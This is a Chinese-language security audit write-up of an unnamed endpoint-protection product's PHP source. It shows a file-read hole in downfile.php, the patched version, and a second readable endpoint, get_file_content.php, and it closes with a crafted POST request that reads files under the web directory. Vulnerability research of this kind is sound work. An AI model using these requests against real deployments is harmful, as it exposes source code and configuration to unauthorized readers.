某终端防护产品代码审计

某个终端防护管理的源码，历史漏洞中有一个漏洞存在于文件 /Console/htmltopdf/downfile.php 中

<?php	
			$filename= $_GET["filename"];
            
			$filename=iconv("UTF-8","GBK//IGNORE", $filename);

   			header("Cache-Control: public"); 
			header("Content-Description: File Transfer"); 
			header('Content-disposition: attachment; filename='.$filename); //文件名   
			header("Content-Type: application/zip"); //zip格式的   
			header("Content-Transfer-Encoding: binary"); //告诉浏览器，这是二进制文件    
			header('Content-Length: '. filesize($filename)); //告诉浏览器，文件大小   
			@readfile($filename);
			?>

下载新版本发现了这个漏洞被修复了，而且添加了鉴权

$filename = $_GET["filename"];

$allow_ext = ['pdf', "csv"];
$ext = getFileExt($filename);

if (!in_array($ext, $allow_ext)) {
    echo "visit error  type:" . $ext;
    return;
}

if(stripos($filename, "..") !== false) {
    echo "only allow visit current dir";
    return ;
}


$filename = iconv("UTF-8", "GBK//IGNORE", $filename);

header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-disposition: attachment; filename=' . $filename); //文件名
header("Content-Type: application/zip"); //zip格式的
header("Content-Transfer-Encoding: binary"); //告诉浏览器，这是二进制文件
header('Content-Length: ' . filesize($filename)); //告诉浏览器，文件大小
@readfile($filename);

那也就是说没有办法文件读取了，重新审计一下获得的源码
通过 vscode 查找相关的关键字

发现其中的 filepath 参数可控，但不能出现 .. 关键字

<?php  
  if(stripos($_POST['filepath'],"..") !== false) {
    echo 'no file founggd';
    exit();
  }
  ini_set("open_basedir", "../");
  $file_path = '../'.iconv("utf-8","gb2312",$_POST['filepath']);
  if(!file_exists($file_path)){
    echo 'no file founggd';
    exit();
  }  

  $fp=fopen($file_path,"r");  
  $file_size=filesize($file_path); 

  $buffer=5024;  
  $file_count=0;  

  while(!feof($fp) && $file_count<$file_size){  
    $file_con=fread($fp,$buffer);  
    $file_count+=$buffer;  
    echo $file_con;  
  }  
  fclose($fp);  
?>

也就是说我们只能读取 /Console 文件夹下的文件了 (Web目录)

构造请求

POST /receive_file/get_file_content.php

filepath=receive_file/get_file_content.php